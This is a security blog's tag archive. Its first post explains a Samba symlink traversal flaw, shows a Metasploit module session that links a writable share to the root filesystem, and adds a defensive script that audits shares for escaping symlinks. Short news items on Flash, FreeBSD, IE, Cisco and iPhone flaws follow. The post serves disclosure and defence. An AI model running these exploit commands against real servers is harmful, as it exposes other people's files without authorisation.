Tag Archives: flaw

Exploiting the Samba Symlink Traversal

Filed under Articles

Last night, Kingcope uploaded a video to YouTube demonstrating a logic flaw in the Samba CIFS service (this was followed by a mailing list post). This bug allows any user with write access to a file share to create a symbolic link to the root filesystem. Through this link, the user can access any file on the system with their current privileges. This affects any Samba service that allows anonymous write access; however, read access to the filesystem is still limited by normal user-level privileges. In most cases, anonymous users are mapped to the 'nobody' account, limiting the damage possible through this exploit.

A Metasploit auxiliary module has been added to verify and test this vulnerability. Update to SVN revision 8369 or newer and start up the Metasploit Console:

$ msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.0.2
msf auxiliary(samba_symlink_traversal) > set SMBSHARE shared
msf auxiliary(samba_symlink_traversal) > set SMBTARGET rooted
msf auxiliary(samba_symlink_traversal) > run

[*] Connecting to the server...
[*] Trying to mount writeable share 'shared'...
[*] Trying to link 'rooted' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.0.2\shared\rooted\

Keep in mind that non-anonymous shares can be used as well; just set SMBUser and SMBPass to the credentials of a valid user account.
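
From the defender's side, the condition the module creates is easy to audit for: a symlink inside the share whose resolved target lies outside the share root. The script below is an added example, not code from Metasploit or the Samba project; it walks a share directory on the file server, reports every escaping link without following it, and generalises the case above (a link to the root filesystem) to any target that resolves outside the share, including relative traversal such as ../../. The function names and the throwaway share layout built in demo_share are assumptions constructed for this example.

```python
"""Audit a Samba share directory for symlinks that escape the share root.

Added example (not Metasploit or Samba code). The flaw described above works
because a client with write access can drop a symlink in the share that
resolves to a path outside it, such as "/". This walk reports every such
link so an administrator can review a share before or after exposing it.
"""
import os
import tempfile


def _resolves_inside(path: str, root: str) -> bool:
    """True if the fully resolved path is root itself or lies beneath it."""
    real = os.path.realpath(path)
    root = os.path.realpath(root)
    return real == root or real.startswith(root.rstrip(os.sep) + os.sep)


def find_escaping_symlinks(share_root: str) -> list:
    """Return (link_path, raw_target) pairs for every symlink under
    share_root whose resolved target lies outside share_root.

    followlinks=False keeps os.walk from descending into linked directories,
    so a link to "/" is reported without the audit crawling the whole disk.
    """
    escapes = []
    for dirpath, dirnames, filenames in os.walk(share_root, followlinks=False):
        # Symlinks to directories are listed in dirnames but not descended.
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                continue
            if not _resolves_inside(full, share_root):
                escapes.append((full, os.readlink(full)))
    return escapes


def demo_share() -> dict:
    """Build a throwaway share layout (constructed for this example) under a
    temporary directory, audit it, and return link name -> flagged?"""
    share = tempfile.mkdtemp(prefix="share_")
    os.makedirs(os.path.join(share, "docs"))
    with open(os.path.join(share, "docs", "readme.txt"), "w") as fh:
        fh.write("benign file\n")
    # Benign link: stays inside the share, must not be flagged.
    os.symlink("docs", os.path.join(share, "docs_alias"))
    # The pattern from the advisory: a link pointing at the root filesystem.
    os.symlink("/", os.path.join(share, "rooted"))
    # Relative traversal that also resolves outside the share (parent of share).
    os.symlink("../../", os.path.join(share, "docs", "up"))
    flagged = {os.path.basename(p) for p, _ in find_escaping_symlinks(share)}
    return {name: name in flagged for name in ("docs_alias", "rooted", "up")}


if __name__ == "__main__":
    for link, target in find_escaping_symlinks(tempfile.mkdtemp(prefix="share_")):
        print(f"{link} -> {target} escapes the share")
    print(demo_share())
```

The audit only reports links that are already present; whether Samba follows them at all is governed by the wide links option in smb.conf, and setting it to no stops the server resolving symlinks that leave the share regardless of who created them.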

XP users should upgrade their Flash installation ASAP

Filed under Security News

Adobe Flash Player 6, the version of the web graphics plug-in that came pre-installed with Windows XP, has been found to contain numerous security flaws, according to Microsoft.

The software giant yesterday issued a security advisory, stating that the vulnerabilities could enable "a specially crafted web page" to remotely execute code on machines running Flash Player 6. Ars Technica notes that Adobe stopped providing security updates for the outdated player in 2006.

Microsoft recommended that XP users immediately update their Flash installation to a newer version, describing the vulnerability as "severe." Users of old versions of Flash running on new operating systems were still vulnerable, though less so than XP users. The company said that it was not aware of any live exploits, but warned that the possibility was certainly there.

Older, unpatched versions of most software are much more likely to be vulnerable to spyware or viruses, experts say. Users are encouraged to update their programs, plug-ins, and operating systems as often as possible to stay ahead of the numerous digital threats present online.

FreeBSD hit with local root vulnerability, patch rushed into service

Filed under Security News

The makers of the open-source operating system FreeBSD have released a hurried patch to correct what has been described as a critical local root vulnerability. The flaw could allow malicious code to be executed with full administrative rights on affected systems.

An exploit for the flaw, published on the Full Disclosure computer security mailing list, was created by a Full Disclosure user known by the online handle Kingcope. Kingcope writes that the "bug resides in the Run-Time Link Editor (rtld)" whose security provisions can be circumvented relatively simply.

Colin Percival, FreeBSD's security officer, recently announced the availability of an emergency patch which fixes the vulnerability. Percival did warn, however, that due to the immediate need for a patch, the work was done with an eye to speed rather than accuracy, and emphasized that downloading and using the patch is at the user's own risk.

The exploit is one of the first in recent memory published for an open-source OS; most recent published exploits have targeted Microsoft or Google products.

New zero-day flaw discovered in older versions of Internet Explorer

Filed under Security News

Security researchers at Symantec report that new malware has targeted a memory corruption vulnerability in Internet Explorer 6 and 7, which carries the potential for system crashes or malicious redirects.

The company revealed the vulnerability in a blog post over the weekend, saying that, while the current iteration of the malware showed "signs of poor reliability," they expect well-written exploit code to hit the internet in "the near future." The Javascript-based exploit - which the researchers have dubbed Bloodhound.Exploit.129 - requires prospective victims to visit an infected website.

As usual, the best way to avoid being infected by this malware is to ensure that all of the latest security patches and updates have been applied. Symantec recommends disabling Javascript and only visiting trusted websites until Microsoft can release a bugfix for the vulnerability.

Though long since superseded by Internet Explorer 8, Internet Explorer 6 and 7 are still widely used by some enterprise consumers for reasons of compatibility and familiarity. Experts recommend upgrading to the latest version and keeping all software patched.

Microsoft counts Chrome coup with discovery of security flaw

Filed under Security News

Security researchers at Microsoft recently discovered a security vulnerability in Google's controversial Chrome Frame for Internet Explorer, a browser plug-in that simulates Chrome functionality within an Internet Explorer session.

The vulnerability, which was fixed by Google in a patch pushed out on Wednesday, could have been used for a cross-origin bypass to gain unauthorized access to the systems on which Chrome Frame was running, although Google says that it was unaware of any active exploits and that the vulnerability would not have allowed "persistent" malware access.

Chrome Frame has been a thorn in the side of Microsoft since its release, with the Redmond giant saying that it made Internet Explorer users less secure while browsing. Until this vulnerability was discovered, however, the company had no evidence of any insecurity.

Chrome Frame's silent, automatic update - a common feature of Google products - has also drawn fire, with critics saying that the company violates its customers' right to control what software is installed on their PCs. Google has responded by asserting that the automatic patching ensures that all users are protected against the latest threats.

Internet Explorer security flaw affects Firefox browser

Filed under Security News

Microsoft's release of its monthly security update on Tuesday contained fixes for three vulnerabilities affecting all versions of Internet Explorer, including one vulnerability that could be exploited on the .NET Framework to infect users of the Firefox browser.

The patch for CVE-2009-2529 fixes a vulnerability in the Windows Presentation Foundation (WPF) component that could be exploited in a browse-and-get-owned scenario, simply by visiting a malicious website.

"While the vulnerability is in an IE component, there is an attack vector for Firefox users as well," Microsoft said on its IE Blog. "The reason is that .NET Framework 3.5 SP1 installs a 'Windows Presentation Foundation' plug-in in Firefox."

That means Firefox users with .NET Framework 3.5 who visit a malicious website could have their Windows PCs hijacked using this vulnerability.

Microsoft said a workaround to mitigate the problem involves disabling XBAP (XAML Browser Applications) in the Internet zone under Internet Explorer's security settings.

Firefox users can disable the Windows Presentation Foundation under Tools, Add-ons and then Plug-ins.

The security update is rated critical for all IE versions, including IE 5.0, IE 6, IE 6 SP1, IE 7 and IE 8, among them the version shipped with Windows 7.

Cisco wireless LAN access points vulnerable to hacker attack

Filed under Security News

Security researchers at AirMagnet have uncovered a security flaw in Cisco's wireless LAN infrastructure that could allow a hacker to hijack a wireless access point to gain access to a customer's network.

The vulnerability involves Cisco's Over-the-Air-Provisioning (OTAP) feature found in its wireless access points (APs). The OTAP feature allows a Cisco AP that is not connected to a Cisco controller to listen to traffic from other nearby Cisco APs and use that information to quickly locate a nearby WLAN controller to associate to.

AirMagnet said there is an unintentional exposure or leakage of information in all lightweight Cisco APs and the potential for APs to be incorrectly assigned to an outside Cisco controller (what the researchers call "SkyJacked") either by accident or at the direction of a potential hacker.

The potential exists for the Cisco AP to "hear" multicast traffic from a neighboring network and incorrectly connect to a neighbor or otherwise unapproved Cisco controller. This ultimately could lead to an enterprise's access point connecting outside of the company to an outside controller and therefore being under outside control.

The same mechanism could be triggered intentionally by a hacker to purposely SkyJack APs and take control of an enterprise's access point.

AirMagnet said it has informed Cisco of this vulnerability and potential exploit. Cisco is "taking appropriate actions."

iPhone security flaw: deleted emails not really deleted

Filed under Security News

A blogger at the gadget site Gizmodo has uncovered a potential email security flaw in iPhone OS 3.0. After deleting emails, it is still possible to recover them using the search function, even though the emails no longer appear in the main mail interface, the site reported.

A purported Apple insider told Gizmodo that the company is aware of the issue and would probably have a fix for the flaw in iPhone OS 3.1.

The problem with being able to access emails that were supposed to have been deleted is that a user could accidentally open old messages containing links to malware or malicious attachments that could be used to hijack the iPhone.

Security firm Trend Micro recently surveyed iPhone users and found that they are more likely to send and receive email as well as click on URLs in email or open an email attachment than other smartphone users.

Nearly half of the iPhone users surveyed (44 percent) said surfing the web from their phone is as safe or safer than from a PC, despite the fact that many do not have security software on the phone.

Other iPhone security risks have been uncovered by hackers, including the ability to take over the iPhone to steal data or send out spam using a maliciously crafted text message.

Black Hat: Hacker exposes iPhone SMS flaw

Filed under Security News

At the Black Hat 2009 security conference in Las Vegas, a professional hacker and security researcher exposed a flaw in Apple's iPhone 3GS which could allow an attacker to hijack the phone as part of a botnet or crash it.

Charlie Miller, an authority on Mac OS X security and the co-author of the Mac Hacker's Handbook, said an SMS flaw could allow an attacker to use text messages to remotely execute malicious code to hijack the device or cause it to crash.

Miller, who had discussed the iPhone security bug at a security conference in Singapore earlier this month, said previously he was able to use a vulnerability in the way the iPhone receives text messages to remotely crash the phone.

He said hackers could theoretically exploit the vulnerability to monitor the location of the phone using GPS, turn on the phone's microphone to eavesdrop on conversations or hijack the phone as part of a botnet to send SMS spam or launch distributed denial-of-service attacks (DDoS).

Miller also warned that "jailbreaking" an iPhone to add software or capabilities not offered by Apple leaves the device vulnerable to hacking and viruses.

"If you care about security, don't use a jailbroken iPhone," Miller said.

Adobe fixes Flash flaws caused by bad Microsoft code

Filed under Security News

Adobe issued web security patches yesterday for flaws in Flash Player and Shockwave that were caused by vulnerable code in the Microsoft Active Template Library (ATL), a code library included with Visual Studio for developing software.

Adobe said the flaws could allow a remote attacker to take control of a system. Adobe is making updates available for Reader and Acrobat v9.1.2 for Windows, Macintosh and UNIX to fix the security bugs. Adobe Shockwave Player 11.5.0.600 and earlier versions on Windows are also affected.

Microsoft earlier this week had patched the critical bugs in Visual Studio, which were related to an errant ampersand (&) in the code. But any software developed using the code remained vulnerable to attacks.

"We determined that Flash Player and Shockwave Player are the two products that leverage vulnerable versions of ATL," Adobe's security response team said on its blog.

Only Internet Explorer plug-ins are vulnerable to the Flash bug, so people using Flash Player within the Firefox browser or other Windows browsers are not vulnerable, Adobe said.

Hackers have actively targeted the Flash security holes using drive-by download or "browse-and-get-owned" attacks hosted on compromised websites.